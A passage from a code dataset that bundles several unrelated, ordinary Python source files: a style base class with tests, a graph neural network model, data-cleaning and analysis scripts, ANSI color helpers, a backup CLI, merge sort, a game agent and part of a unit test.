Otherwise, style can be later changed, e.g.:\n\n class HumanStyle(BaseStyle):\n ...\n\n def __init__(self, style):\n BaseStyle.__init__(self, style, fixed = False)\n\n ...\n\n human = HumanStyle(\"male\")\n human.style = \"female\"\n\n Child classes may also define attribute name for stored current style,\n e.g.:\n\n class HumanStyle(BaseStyle):\n ...\n\n def __init__(self, style):\n BaseStyle.__init__(self, style, attribute_name = \"human_style\")\n\n ...\n\n Otherwise a random variable name is used.\n '''\n\n def __init__(self, obj_style, attribute_name = None, fixed = True):\n '''\n Initialize style with value if allowed by __contains__, store in\n a variable with attribute_name (or random name if not set), and\n fix style if fixed argument is set to True\n '''\n\n if attribute_name:\n self.__attribute_name = \"__{0}\".format(attribute_name)\n else:\n self.__attribute_name = \"__{0:x}\".format(random.getrandbits(128))\n\n # allow style to be set first\n self.__fixed = False\n\n self.style = obj_style\n\n # fix style if asked to\n self.__fixed = fixed\n\n @property\n def style(self):\n '''\n Get current style\n '''\n\n return getattr(self, self.__attribute_name)\n\n @style.setter\n def style(self, value):\n '''\n Style attribute is only set if allowed by __contains__ method and not\n fixed\n '''\n\n if self.__fixed:\n raise AttributeError(\"can not change fixed style\")\n\n if value not in self:\n raise AttributeError(\"unsupported style {0}\".format(value))\n else:\n setattr(self, self.__attribute_name, value)\n\n @style.deleter\n def style(self):\n '''\n Remove style attribute\n '''\n\n delattr(self, self.__attribute_name)\n\n def __contains__(self, value):\n '''\n Do not allow any style by default\n '''\n\n return False\n\n def __str__(self):\n '''\n Nice print\n '''\n\n return \"<{Class} {Style} at 0x{ID:x}>\".format(\n Class = self.__class__.__name__,\n ID = id(self),\n Style = self.style\n )\n\nif \"__main__\" == __name__:\n import unittest\n\n class HumanStyle(BaseStyle):\n human_styles = set([\"male\", \"female\"])\n\n def __init__(self, style, fixed = True):\n BaseStyle.__init__(self, style, fixed = fixed)\n\n def __contains__(self, style):\n return (style in self.human_styles or\n BaseStyle.__contains__(self, style))\n\n class TestBaseStyle(unittest.TestCase):\n def test_empty(self):\n self.assertRaises(AttributeError, BaseStyle, \"hello\")\n\n class TestHumanStyle(unittest.TestCase):\n def test_male(self):\n human = HumanStyle(\"male\")\n self.assertEqual(human.style, \"male\")\n\n def test_female(self):\n human = HumanStyle(\"female\")\n self.assertEqual(human.style, \"female\")\n\n def test_ape(self):\n self.assertRaises(AttributeError, HumanStyle, \"ape\")\n\n def test_fixed(self):\n human = HumanStyle(\"male\")\n try:\n human.style = \"female\"\n except AttributeError:\n pass\n\n self.assertEqual(human.style, \"male\")\n\n def test_not_fixed(self):\n human = HumanStyle(\"male\", fixed = False)\n try:\n human.style = \"female\"\n except AttributeError:\n pass\n\n self.assertEqual(human.style, \"female\")\n\n unittest.main()\n","sub_path":"python/template/base_style.py","file_name":"base_style.py","file_ext":"py","file_size_in_byte":6938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"250676078","text":"import torch.nn as nn\nimport torch.nn.functional as F\nfrom gcn.pygcn.layers import GraphConvolution\nimport torch\nimport numpy as np\nfrom torch.autograd import Variable\n\nclass rff(nn.Module):\n # rff_width, the 
larger the better approximation\n def __init__(self, sigma=1, rff_width=20000):\n super(rff, self).__init__()\n self.sigma = sigma\n self.rff_width = rff_width\n self.phase_shift = None\n self.RFF_scale = np.sqrt(2.0 / self.rff_width)\n\n def initialize_RFF(self, x, sigma, output_torch, dtype=torch.FloatTensor):\n self.x = x\n\n if self.phase_shift is not None: return\n # if x.shape[0] == self.N: return\n\n self.N = x.shape[0]\n self.d = x.shape[1]\n self.sigma = sigma\n\n if type(x) == torch.Tensor or type(x) == np.ndarray:\n self.phase_shift = 2 * np.pi * np.random.rand(1, self.rff_width)\n # self.phase_shift = np.matlib.repmat(b, self.N, 1)\n self.rand_proj = np.random.randn(self.d, self.rff_width) / (self.sigma)\n else:\n raise ValueError('An unknown datatype is passed into get_rbf as %s' % str(type(x)))\n\n self.use_torch(output_torch, dtype)\n\n def use_torch(self, output_torch, dtype):\n if not output_torch: return\n\n dvc = self.x.device\n self.phase_shift = torch.from_numpy(self.phase_shift)\n self.phase_shift = Variable(self.phase_shift.type(dtype), requires_grad=False)\n self.phase_shift = self.phase_shift.to(dvc,\n non_blocking=True) # make sure the data is stored in CPU or GPU device\n\n self.rand_proj = torch.from_numpy(self.rand_proj)\n self.rand_proj = Variable(self.rand_proj.type(dtype), requires_grad=False)\n self.rand_proj = self.rand_proj.to(dvc, non_blocking=True) # make sure the data is stored in CPU or GPU device\n\n def forward(self, x):\n self.initialize_RFF(x, self.sigma, True)\n\n if type(self.x) == np.ndarray:\n self.x = torch.from_numpy(self.x)\n self.x = Variable(self.x.type(self.dtype), requires_grad=False)\n\n elif type(self.x) != torch.Tensor:\n raise ValueError('An unknown datatype is passed into get_rbf as %s' % str(type(self.x)))\n\n P = self.RFF_scale * torch.cos(torch.mm(self.x, self.rand_proj) + self.phase_shift)\n return P\n\n def torch_rbf(self, x, sigma):\n P = self.__call__(x, sigma)\n K = torch.mm(P, P.transpose(0, 1))\n # K = (2.0/self.rff_width)*K\n K = F.relu(K)\n\n return K\n\n def np_feature_map(self, x):\n const = np.sqrt(2.0 / self.rff_width)\n feature_map = const * np.cos(x.dot(self.rand_proj) + self.phase_shift)\n\n return feature_map\n\n def np_rbf(self):\n P = np.cos(self.x.dot(self.rand_proj) + self.phase_shift)\n K = (2.0 / self.rff_width) * (P.dot(P.T))\n K = np.maximum(K, 0)\n K = np.minimum(K, 1)\n return K\n\n def get_rbf(self, x, sigma, output_torch=False, dtype=torch.FloatTensor):\n self.dtype = dtype\n self.initialize_RFF(x, sigma, output_torch, dtype)\n\n if output_torch:\n return self.torch_rbf(x, sigma)\n else:\n return self.np_rbf()\n\nclass GCN(nn.Module):\n def __init__(self, nfeat, nhid, nclass, dropout):\n super(GCN, self).__init__()\n\n self.gc1 = GraphConvolution(nfeat, nhid)\n # self.gc2 = GraphConvolution(nhid, nhid)\n # self.gc3 = GraphConvolution(nhid, nhid)\n self.gc4 = GraphConvolution(nhid, nclass)\n self.dropout = dropout\n self.act = rff(rff_width=nhid)\n # self.act = F.relu\n\n def forward(self, x, adj):\n x = self.act(self.gc1(x, adj))\n # x = self.act(self.gc2(x, adj))\n # x = self.act(self.gc3(x, adj))\n x = F.dropout(x, self.dropout, training=self.training)\n x = self.gc4(x, adj)\n return F.log_softmax(x, dim=1)\n","sub_path":"gcn/pygcn/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"272515350","text":"# fix_isbn.py - clean up mix of different delimiters in 
hh.bib\n\nimport pyglottolog.api\nfrom pyglottolog.references import Isbns\n\nFIELD = 'isbn'\n\nFIXES = {}\n\nif __name__ == '__main__':\n api = pyglottolog.api.Glottolog()\n hh = api.bibfiles['hh.bib']\n\n def iterfixed(bibfile):\n for e in bibfile.iterentries():\n value = e.fields.get(FIELD)\n if value is not None:\n value = FIXES.get(value, value)\n if value is None:\n del e.fields[FIELD]\n else:\n isbns = Isbns.from_field(value)\n e.fields[FIELD] = isbns.to_string()\n yield e.key, (e.type, e.fields)\n\n hh.save(list(iterfixed(hh)))\n","sub_path":"scripts/fix_isbn.py","file_name":"fix_isbn.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"380614145","text":"#! /usr/bin/python3\n\nwhile True:\n dokladnosc = input('Pi will be computed using the Leibniz series. Enter a natural number greater than one; the larger the number, the more accurate the approximation of Pi!: ')\n if dokladnosc.isdecimal():\n dokladnosc = int(dokladnosc)\n break\n else:\n print('Enter a natural number greater than one')\n\nwhile True:\n if dokladnosc == 1:\n liczba_pi = 1\n break\n elif dokladnosc > 1:\n liczba_pi = 1\n dokladnosc += 1\n for i in range(1, dokladnosc + 1):\n if i % 2 == 1:\n liczba_pi = liczba_pi - 1/(i * 2 + 1)\n else:\n liczba_pi = liczba_pi + 1/(i * 2 + 1)\n break\n else:\n print('Enter a natural number greater than one!')\n continue\n\nliczba_pi = 4 * liczba_pi\n\nprint(liczba_pi)\n","sub_path":"liczba_pi.py","file_name":"liczba_pi.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"520488198","text":"#====================================================================\n# MUON0.py for events that passed muon triggers\n# This requires the reductionConf flag MUON0 in Reco_tf.py \n#====================================================================\n\n# Set up common services and job object. 
\n# This should appear in ALL derivation job options\n# include(\"DerivationFrameworkCore/DerivationFrameworkMaster.py\")\nfrom DerivationFrameworkCore.DerivationFrameworkMaster import *\nfrom DerivationFrameworkMuons.MuonsCommon import *\n# from DerivationFrameworkJetEtMiss.METCommon import *\n\n#====================================================================\n# SET UP STREAM \n#====================================================================\nstreamName = derivationFlags.WriteDAOD_MUON0Stream.StreamName\nfileName = buildFileName( derivationFlags.WriteDAOD_MUON0Stream )\nMUON0Stream = MSMgr.NewPoolRootStream( streamName, fileName )\nMUON0Stream.AcceptAlgs([\"MUON0Kernel\"])\n\n# augStream = MSMgr.GetStream( streamName )\n# evtStream = augStream.GetEventStream()\n\ntriggerList1 = ['HLT_.*mu\\d+.*', 'L1_.*MU\\d+.*', 'HLT_noalg_L1.*MU\\d+.*']\n#triggerList1 = []\ntriggerList = ['HLT_.*mu.*', 'L1_.*MU.*','HLT_noalg_L1.*MU.*']\n\nfrom DerivationFrameworkCore.ThinningHelper import ThinningHelper\nMUON0ThinningHelper = ThinningHelper( \"MUON0ThinningHelper\" )\nMUON0ThinningHelper.TriggerChains = '|'.join(triggerList1)\nprintfunc (MUON0ThinningHelper.TriggerChains)\nMUON0ThinningHelper.AppendToStream( MUON0Stream )\nthinningHelperTool = getattr( ToolSvc, \"MUON0ThinningHelperSlim\" )\nthinningHelperTool.FeatureInclusionList += ['HLT_xAOD__L2StandAloneMuonContainer_MuonL2SAInfo','HLT_xAOD__L2StandAloneMuonContainer_MuonL2SAInfoAux.','HLT_xAOD__L2CombinedMuonContainer_MuonL2CBInfo','HLT_xAOD__L2CombinedMuonContainer_MuonL2CBInfoAux.','HLT_xAOD__L2IsoMuonContainer_MuonL2ISInfo','HLT_xAOD__L2IsoMuonContainer_MuonL2ISInfoAux.','HLT_TrigRoiDescriptorCollection_forMS','HLT_TrigRoiDescriptorCollection_forMSAux.','HLT_TrigRoiDescriptorCollection_forID','HLT_TrigRoiDescriptorCollection_forIDAux.']\n\n\n\n#====================================================================\n# AUGMENTATION TOOLS \n#====================================================================\n\n#====================================================================\n# STRING BASED SKIMMING TOOL \n#====================================================================\nMUON0_skimming_tools = []\n\n### trigger seleciton\nfrom DerivationFrameworkTools.DerivationFrameworkToolsConf import DerivationFramework__TriggerSkimmingTool\nMUON0SkimmingTool0a = DerivationFramework__TriggerSkimmingTool(name = \"MUON0SkimmingTool0a\",\n TriggerListOR = triggerList,\n TriggerListAND = [])\nToolSvc += MUON0SkimmingTool0a\n\n### muon selection\nexpression = 'count(Muons.pt>30*GeV)>0'\nfrom DerivationFrameworkTools.DerivationFrameworkToolsConf import DerivationFramework__xAODStringSkimmingTool\nMUON0SkimmingTool0b = DerivationFramework__xAODStringSkimmingTool(name = \"MUON0SkimmingTool0b\",\n expression = expression)\nToolSvc += MUON0SkimmingTool0b\n\n### OR combination\nfrom DerivationFrameworkTools.DerivationFrameworkToolsConf import DerivationFramework__FilterCombinationOR\nMUON0SkimmingTool0 = DerivationFramework__FilterCombinationOR(name=\"MUON0SkimmingTool0\",\n FilterList=[MUON0SkimmingTool0a, MUON0SkimmingTool0b])\nToolSvc += MUON0SkimmingTool0\n\n### adding the combined tool\nMUON0_skimming_tools.append(MUON0SkimmingTool0)\n\n#====================================================================\n# THINNING TOOL \n#====================================================================\n# Tracks associated with Muons\nMUON0_thinning_tools = []\n\n## keep only tracks near muon\nthinning_expression2 = \"Muons.pt > 4*GeV\"\nfrom 
DerivationFrameworkInDet.DerivationFrameworkInDetConf import DerivationFramework__MuonTrackParticleThinning\nMUON0ThinningTool2 = DerivationFramework__MuonTrackParticleThinning(name = \"MUON0ThinningTool2\",\n StreamName = streamName,\n MuonKey = \"Muons\",\n SelectionString = thinning_expression2,\n ConeSize = 0.4,\n InDetTrackParticlesKey = \"InDetTrackParticles\")\nToolSvc += MUON0ThinningTool2\nMUON0_thinning_tools.append(MUON0ThinningTool2)\n\n### also for forward tracks\nthinning_expression3 = \"Muons.muonType==4\"\nMUON0ThinningTool2f = DerivationFramework__MuonTrackParticleThinning(name = \"MUON0ThinningTool2f\",\n StreamName = streamName,\n MuonKey = \"Muons\",\n SelectionString = thinning_expression3,\n ConeSize = 0.5,\n InDetTrackParticlesKey = \"InDetForwardTrackParticles\")\nToolSvc += MUON0ThinningTool2f\nMUON0_thinning_tools.append(MUON0ThinningTool2f)\n\n#====================================================================\n# CREATE THE DERIVATION KERNEL ALGORITHM AND PASS THE ABOVE TOOLS \n#====================================================================\nfrom DerivationFrameworkCore.DerivationFrameworkCoreConf import DerivationFramework__DerivationKernel\nDerivationFrameworkJob += CfgMgr.DerivationFramework__DerivationKernel(\"MUON0Kernel\",\n# \t\t\t\t\t\t\t\t\tAugmentationTools = [],\n ThinningTools = MUON0_thinning_tools,\n SkimmingTools = MUON0_skimming_tools\n )\n\n#====================================================================\n# CONTENT LIST \n#====================================================================\nfrom DerivationFrameworkMuons.StreamConfig import MuonsDxAODStreamConfigurer as conf\nconf.Config(MUON0Stream, 'MUON0')\n","sub_path":"PhysicsAnalysis/DerivationFramework/DerivationFrameworkMuons/share/MUON0.py","file_name":"MUON0.py","file_ext":"py","file_size_in_byte":6645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"155956328","text":"\n\nclass CrimeLister():\n\n crime_records = []\n crime_counter = dict()\n\n def __init__(self, filename):\n self.filename = filename\n\n def populate_record(self):\n with open(self.filename) as f:\n lines = f.readlines()\n for line in lines:\n if line.find(\"DATE\") == -1: ## EXCLUDE HEADER\n line_content = line.strip()\n line_content = line_content.split(\",\")\n crime_type = line_content[len(line_content)-1]\n crime_id = line_content[len(line_content)-2]\n crime_key = crime_type + \",\" + crime_id\n self.crime_counter[crime_key] = self.crime_counter.get(crime_key + \"\", 0) + 1\n for crime in self.crime_counter.keys():\n crime_type_id = crime.split(\",\")\n self.crime_records.append([crime_type_id[0],crime_type_id[1],self.crime_counter[crime]])\n\n\n def print_crime_records(self):\n print(\"CRIME TYPE\".ljust(30) + \"CRIME ID\".ljust(10) + \"CRIME COUNT\".ljust(10)) ## HEADER PRINT\n print(\"-\"*50)\n for record in self.crime_records:\n print(str(record[0]).ljust(30) + str(record[1]).ljust(10) + str(record[2]).ljust(10))\n\ndef main():\n filepath = \"./Crime.csv\"\n crime_lister = CrimeLister(filepath)\n crime_lister.populate_record()\n crime_lister.print_crime_records()\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"575898109","text":"\"\"\"\nModule ansi_colors.py\n------------------------------------\n\n@author: awegsche\n\n@version: 1.0\n\nHelper functions to 
convert RGB and html colors to ansi escape sequences\n\n\"\"\"\n\nimport re\nfrom matplotlib import colors\n\nONE_OVER_256 = 0.00390625\nONE_OVER_16 = 0.0625\n\n\ndef ansi(color=\"none\"):\n \"\"\"\n Converts ```color``` into an ANSI escape sequence changing the color of the current\n terminal output.\n\n Args:\n color (string or tuple): A string representing the color. This can be one of the following:\n - an HTML color in the format ```#RRGGBB``` or ```#RGB```\n - a matplotlib color name like ```\"firebrick\"```\n - an RGB color in the format ```rgb:r,g,b``` where r,g,b \\\\in [0,1)\n example: ```rgb:1.0,0.0,0.0```\n - the string 'none' to reset the color to default\n - a tuple (r, g, b) where r,g,b \\\\in [0,1)\n\n \"\"\"\n if color == \"\" or color is None:\n return \"\\33[0m\"\n if isinstance(color, tuple):\n return \"\\33[38;2;{:d};{:d};{:d}m\".format(int(255*color[0]),\n int(255*color[1]),\n int(255*color[2]))\n tupl = clr_tuple(color)\n if tupl is not None:\n return ansi(tupl)\n if color == \"bold\":\n return \"\\33[1m\"\n if color == \"/bold\":\n return \"\\33[22m\"\n return \"\\33[0m\"\n\n\ndef clr_multiply(clr1, clr2):\n \"\"\" multiplies two colors\n\n Args:\n clr1 (string): representation (see ansi) of first color\n clr2 (string): representation of the second color\n \"\"\"\n a = clr_tuple(clr1)\n b = clr_tuple(clr2)\n\n return (max(0.0, min(1.0, a[0] * b[0])),\n max(0.0, min(1.0, a[1] * b[1])),\n max(0.0, min(1.0, a[2] * b[2])))\n\n\ndef clr_tuple(colorstring):\n \"\"\" converts colorstring into a tuple of ints (r,g,b)\n\n Args:\n colorstring (string): string representation of the color, see ansi\n \"\"\"\n\n if colorstring[0] == '#':\n if len(colorstring) == 7:\n return (ONE_OVER_256 * float(_hexbyte(colorstring[1:3])),\n ONE_OVER_256 * float(_hexbyte(colorstring[3:5])),\n ONE_OVER_256 * float(_hexbyte(colorstring[5:7])))\n if len(colorstring) == 4:\n return (ONE_OVER_16 * float(_hexchar(colorstring[1])),\n ONE_OVER_16 * float(_hexchar(colorstring[2])),\n ONE_OVER_16 * float(_hexchar(colorstring[3])))\n if colorstring in colors.CSS4_COLORS:\n return clr_tuple(colors.CSS4_COLORS[colorstring])\n if colorstring in colors.BASE_COLORS:\n return clr_tuple(colors.BASE_COLORS[colorstring])\n\n rgb_re = re.compile(\"rgb:(.*),(.*),(.*)\")\n\n rgb_match = rgb_re.search(colorstring)\n if rgb_match:\n return (float(rgb_match.group(1)),\n float(rgb_match.group(2)),\n float(rgb_match.group(3)))\n return None\n\n\ndef _hexbyte(b):\n \"\"\" Converts the hex number b to integer\n\n Args:\n b (string): a two-character representation of a byte, like 01, FF, A0 etc.\n \"\"\"\n return _hexchar(b[0]) * 16 + _hexchar(b[1])\n\n\ndef _hexchar(c):\n \"\"\" Converts the character b into a number.\n\n Args:\n c (char): character in base 16: 1, ... 9, A, ... F\n accepts lower case letters a, ... 
f\n \"\"\"\n if c == '1': return 1\n if c == '2': return 2\n if c == '3': return 3\n if c == '4': return 4\n if c == '5': return 5\n if c == '6': return 6\n if c == '7': return 7\n if c == '8': return 8\n if c == '9': return 9\n if c == 'A' or c == 'a': return 10\n if c == 'B' or c == 'b': return 11\n if c == 'C' or c == 'c': return 12\n if c == 'D' or c == 'd': return 13\n if c == 'E' or c == 'e': return 14\n if c == 'F' or c == 'f': return 15\n return 0\n","sub_path":"ansi_colors.py","file_name":"ansi_colors.py","file_ext":"py","file_size_in_byte":3811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"269663966","text":"#!/usr/bin/env python3\n\nimport sys\nimport os\nimport argparse\nimport inspect\n\npath = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nsys.path.insert(0, path)\n\nif __name__ == \"__main__\":\n from bahubapp.service.configurationfactory import ConfigurationFactory\n from bahubapp.app import Bahub\n from bahubapp.service.logger import LoggerFactory\n from bahubapp.service.errorhandler import ErrorHandlerService\n from bahubapp.service.notifier import Notifier\n\n\ndef main():\n #\n # Arguments parsing\n #\n parser = argparse.ArgumentParser()\n parser.add_argument('options', metavar='options', type=str, nargs='+',\n help='[backup/restore/list/recover/snapshot] [backup or recovery plan name]')\n\n parser.add_argument('--debug', help='Prints debugging messages', default=False, action=\"store_true\")\n parser.add_argument('--uncensored', help='Do not remove credentials from logs', default=False, action=\"store_true\")\n\n parser.add_argument('--config',\n help='Path to the configuration file',\n default=os.path.expanduser('~/.bahub.yaml'))\n\n parser.add_argument('--logs-path',\n help='Logs path',\n default=os.path.expanduser('/tmp'))\n\n parser.add_argument('--logs-file',\n help='Log to a single file, instead of creating files by date',\n default='')\n\n parser.description = 'Bahub - backup automation client for File Repository API'\n\n parsed = parser.parse_args()\n\n if 0 < len(parsed.options) < 2:\n print(' You need to specify two options eg. \"backup some-name\"')\n print('')\n print('Example usage:')\n print(' backup my_db_1')\n print(' restore my_db_1 latest')\n print(' restore my_db_1 v2')\n print(' list my_db_1')\n print(' recover my_recovery_plan_name')\n print(' snapshot my_recovery_plan_name')\n print('')\n sys.exit(1)\n\n if not os.path.isfile(parsed.config):\n print(' Configuration file \"' + str(parsed.config) + '\" does not exist')\n sys.exit(1)\n\n error_handler = None\n notifier = None\n\n try:\n config_factory = ConfigurationFactory(parsed.config, parsed.debug)\n notifier = Notifier(config_factory.get_notifiers())\n error_handler = ErrorHandlerService(config_factory.get_error_handlers())\n\n app = Bahub(\n factory=config_factory,\n options={\n 'options': parsed.options,\n 'debug': parsed.debug,\n 'config': parsed.config\n },\n uncensored=parsed.uncensored,\n logger=LoggerFactory.create(parsed.debug, parsed.logs_path, parsed.logs_file),\n notifier=notifier\n )\n\n app.run_controller(parsed.options[0], parsed.options[1], parsed.debug, parsed.options)\n\n except Exception as e:\n if parsed.debug:\n raise e\n\n if error_handler:\n error_handler.record_exception(e)\n\n if notifier:\n notifier.exception_occurred(e)\n\n print(e)\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"client/bahub/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"390892930","text":"'''\n- compute subreddit-topcategory features\n- and subredit topcat/cat pca\n'''\n\nfrom pyspark import SparkContext, SparkConf, SparkFiles\nimport json\nimport csv\nimport time\nimport math\nimport pickle\nfrom functools import reduce\nfrom jobs.shared import utils\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.preprocessing import normalize\n\n\ndef analyze(sc, **kwargs):\n pp = kwargs['pp']\n job_name = kwargs['job-name']\n timestamp = int(time.time())\n hdfs_root = kwargs['hdfs-root']\n input_path = utils.get_input_path(hdfs_root, kwargs.get('input-job', None), kwargs.get('input-path', None))\n\n _subreddit_topcategory = pickle.load(open('/home/username/data/output/_jobs/subreddit_topcategory.pickle','rb'))\n subreddit_topcategory = sc.broadcast(_subreddit_topcategory)\n\n _subreddit_df = pickle.load(open('/home/username/data/output/_jobs/subreddit_df.pickle','rb'))\n subreddit_df = sc.broadcast(_subreddit_df)\n\n subreddits_grouped_by_categories = subreddits_to_categories(_subreddit_df, subreddit_topcategory)\n _vectorizers = {}\n for k,v in subreddits_grouped_by_categories.items():\n dv = DictVectorizer()\n dv.fit_transform(v)\n _vectorizers[k] = dv\n vectorizers = sc.broadcast(_vectorizers)\n\n\n data = sc.pickleFile(input_path)\n\n authors_total = data.count()\n author_category = data.map(lambda x: get_feature_vectors(x, subreddit_df, authors_total, vectorizers) )\n\n output_path = utils.hdfs_get_output_path(hdfs_root, job_name)\n author_category.saveAsPickleFile(output_path)\n\n\ndef get_feature_vectors(author, subreddit_df, authors_total, vectorizers):\n category_subreddits = author['topcategory_subreddits']\n\n catsr_vecs = {}\n for cat, subreddits in category_subreddits.items():\n all_terms_in_doc = reduce(lambda a,b: a+b, map(lambda x: (x['submissions'] + x['comments']), author['subreddits']))\n tfidf = {}\n lognorm = {}\n raw = {}\n for k,v in subreddits.items():\n try:\n count = v\n idf = (math.log(authors_total / subreddit_df.value[k]))\n tfidf[k] = (count / all_terms_in_doc) * idf\n lognorm[k] = math.log(1 + count) * idf\n raw[k] = count\n except KeyError:\n print(k) \n\n catsr_vecs[cat] = {}\n catsr_vecs[cat]['tfidf'] = vectorizers.value[cat].transform(tfidf)\n catsr_vecs[cat]['lntfidf'] = vectorizers.value[cat].transform(lognorm)\n catsr_vecs[cat]['raw'] = vectorizers.value[cat].transform(raw)\n catsr_vecs[cat]['rawnorm'] = normalize(catsr_vecs[cat]['raw'])\n\n author['topcatsr'] = catsr_vecs\n\n return author\n\ndef subreddits_to_categories(subreddit_df, subreddit_category):\n category_subreddits = {}\n for k,v in subreddit_df.items():\n cat = subreddit_category.value.get(k, 'Other')\n\n if cat not in category_subreddits:\n category_subreddits[cat] = {}\n category_subreddits[cat][k] = v\n\n return category_subreddits\n\n","sub_path":"pyspark/jobs/author/subreddit_topcategories.py","file_name":"subreddit_topcategories.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"297567378","text":"# Merge Sort\n\n\ndef merge(left, right):\n \"\"\"Merges two sorted lists.\n Args:\n left: A sorted list.\n right: A sorted list.\n\n Returns:\n The sorted list resulting from merging the two sorted sublists.\n\n Requires:\n left and right are sorted.\n \"\"\"\n\n items = []\n\n i = 0\n j = 0\n while i < len(left) and j < len(right):\n if left[i] <= right[j]:\n items.append(left[i])\n i = i + 1\n else:\n items.append(right[j])\n j = j + 1\n\n if i < len(left):\n items.extend(left[i:])\n elif j < len(right):\n items.extend(right[j:])\n\n return items\n\n\ndef merge_sort(items):\n \"\"\"Sorts a list of items.\n\n Uses merge sort to sort the list items.\n \n Args:\n items: A list of items.\n\n Returns:\n The sorted list of items.\n \"\"\"\n n = len(items)\n if n < 2:\n return items\n\n m = n // 2\n left = merge_sort(items[:m])\n right = merge_sort(items[m:])\n return merge(left, right)\n","sub_path":"AutonomousSourceCode/data/raw/sort/39cf0f2e-d6c1-4606-9e97-3f60bda3a6a1__merge_sort_improved.py","file_name":"39cf0f2e-d6c1-4606-9e97-3f60bda3a6a1__merge_sort_improved.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"557519929","text":"from .brain import Brain\nfrom ..shared.strategies import RandomStrategy, RetreatStrategy, StalkStrategy, PickupStrategy, AdvKillStrategy, \\\n BasicAvoidStrategy, DetonateStrategy, BombStrategy, SimpleBombStrategy, AdvBlockStrategy, StalkTwoStrategy\nfrom ..shared.utils.benchmark import Benchmark\n\n\nclass Agent:\n def __init__(self):\n self.brain = Brain()\n self.strategies = {\n 'random': RandomStrategy(),\n 'retreat': RetreatStrategy(),\n 'pickup': PickupStrategy(),\n 'stalk': StalkStrategy(),\n 'basic_avoid': BasicAvoidStrategy(),\n 'kill': AdvKillStrategy(),\n 'detonate': DetonateStrategy(),\n 'bomb': BombStrategy(),\n 'block_destroy': AdvBlockStrategy(),\n 'simple_bomb': SimpleBombStrategy()\n }\n self.action_queue = []\n self.prev_tick = -1\n self.benchmark = Benchmark()\n\n def next_move(self, tick_number, game_state):\n # If it prints this out in console, it means algorithm is performing suboptimally\n if tick_number - self.prev_tick != 1:\n print(f'Skipped a Tick: Tick #{tick_number}, skipped {tick_number - self.prev_tick}')\n self.benchmark.start('move')\n game_state['tick'] = tick_number\n print(f'Starting tick #{tick_number}')\n\n if not self.action_queue:\n # Gets brain to eval environment, then spit out the strategy chosen (as string)\n self.benchmark.start('decision')\n strategy_name = self.brain.get_next_strategy(game_state)\n self.benchmark.end('decision')\n self.benchmark.start('execution')\n strategy = self.strategies.get(strategy_name) \n strategy.update(game_state)\n actions = strategy.execute(game_state)\n self.benchmark.end('execution')\n print(f'Tick {tick_number}: executing {strategy_name}: {actions}')\n self.action_queue = self.action_queue + actions\n\n # print(game_state) #-> To check if you've added new things to game_state\n self.prev_tick = tick_number\n self.benchmark.end('move')\n return self.action_queue.pop(0)\n","sub_path":"python3/agents/aggro_totoro_agent/my_agent.py","file_name":"my_agent.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"440453908","text":"# Copyright 2015 OpenStack Foundation\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport mock\nfrom testtools.matchers import HasLength\n\nfrom watcher.common import exception\n# from watcher.common import utils as w_utils\nfrom watcher import objects\nfrom watcher.tests.db import base\nfrom watcher.tests.db import utils\n\n\nclass TestAuditObject(base.DbTestCase):\n\n def setUp(self):\n super(TestAuditObject, self).setUp()\n self.fake_audit = utils.get_test_audit()\n\n def test_get_by_id(self):\n audit_id = self.fake_audit['id']\n with mock.patch.object(self.dbapi, 'get_audit_by_id',\n autospec=True) as mock_get_audit:\n mock_get_audit.return_value = self.fake_audit\n audit = objects.Audit.get(self.context, audit_id)\n mock_get_audit.assert_called_once_with(self.context,\n audit_id)\n self.assertEqual(self.context, audit._context)\n\n def test_get_by_uuid(self):\n uuid = self.fake_audit['uuid']\n with mock.patch.object(self.dbapi, 'get_audit_by_uuid',\n autospec=True) as mock_get_audit:\n mock_get_audit.return_value = self.fake_audit\n audit = objects.Audit.get(self.context, uuid)\n mock_get_audit.assert_called_once_with(self.context, uuid)\n self.assertEqual(self.context, audit._context)\n\n def test_get_bad_id_and_uuid(self):\n self.assertRaises(exception.InvalidIdentity,\n objects.Audit.get, self.context, 'not-a-uuid')\n\n def test_list(self):\n with mock.patch.object(self.dbapi, 'get_audit_list',\n autospec=True) as mock_get_list:\n mock_get_list.return_value = [self.fake_audit]\n audits = objects.Audit.list(self.context)\n self.assertEqual(mock_get_list.call_count, 1)\n self.assertThat(audits, HasLength(1))\n self.assertIsInstance(audits[0], objects.Audit)\n self.assertEqual(self.context, audits[0]._context)\n\n def 